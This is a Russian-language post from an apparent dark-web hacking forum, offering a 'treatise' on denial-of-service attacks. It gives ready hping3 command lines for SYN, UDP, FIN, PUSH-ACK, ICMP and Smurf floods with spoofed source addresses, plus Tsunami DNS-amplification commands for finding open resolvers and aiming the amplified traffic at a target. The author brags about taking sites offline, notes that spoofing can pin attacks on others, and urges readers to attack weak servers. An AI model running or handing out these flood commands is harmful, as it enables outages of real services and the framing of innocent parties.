трактат о DoS-e | dos - flood attack

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 631
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Всем привет, решил я поделится с Вами этими методиками и инструментами ибо, зае..ли эти китайские услуги, СОДА ,Малышева, глисты для похудения и всякого рода ..уета)) Те люди у которых не установлен (или лень его натянуть на браузер)
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, они меня поймут и часто еще обращаются с просьбами положить сайты с педофилией(в луковице как правило) что я с успехом и делаю, где и Вам рекомендую оттачивать это "не легкое" ремесло..))

И так что же что такое DOS атака подробно Вы узнаете
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
от меня в двух словах DOS - это когда она ведется от одной машины то есть один на один DDOS - это когда от 2-ух и более типо >BotNet Дедок, привет!))

И так начнем с классики с утилиты которая меня в свое время очень поразила своим функционалом (не скажу каким) смысл этой атаки есть таков, что можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию)) в общем веселая программа
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
которая с успехом проводит
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
на TCP -протокол соединения, а он как Вы знаете<-(наверное) обладает трехсторонним рукопожатием.

Код:
hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Код:
hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
Ну и старички помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.


Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


TCP_FIN-флуд это если атакующий только атакует сервер без TCP-соединения, пакет FIN будет отброшен, но сервер все равно будет выделять некоторые ресурсы для просмотра пакета, чтобы предотвратить избыточность и в скором времени он ляжет

Код:
hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP
PUSH _ACK-флуд это если сервер раздразнить этим флудом, он может обидеться и ваще перестать всех обслуживать)


Код:
hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP
ICMP_IGMP-флуд это мало эффективная атака нужно проводить долго и не одному но все же укажу её, так это же трактат)


Код:
hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
SMURF-флуд это Злоумышленник выберет некоторые промежуточные сайты в качестве усилителей, а затем отправит огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель.

Код:
hping3 --icmp --spoof TARGET_IP BROADCAST_IP
С это утилитой пожалуй все, но представлю Вам еще один инструмент:
Tsunami - DNS Amplification Attack Tool - Он предназначен для исследования и тестирования ваших брандмауэров, а также IDS / IPS. Не думайте об использовании этого инструмента для атаки. Это очень дорого из-за низкой производительности. Эффект может отличаться в зависимости от ширины полосы, количества сеансов и размера обратной связи от запроса домена, а также от мощности инструмента. <<<-- это перевод от
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, но поверьте эта прожка достойна внимания!))
Код:
./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
на
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
, как
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
без
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
меня!?
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
! И дополню что
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
полно в дистрибутиве
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
46 как видите.) на любой вкус и цвет.

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Напутствие: "Применяйте такого рода атаки в благородных целях!" так как нормальный сервак Вам одному положить не удастся, а вот какой нить слабенький за пару долларов в месяц или вообще free, легко на которых как правило размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.. в общем Вы меня надеюсь услышали!) Удачи!
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя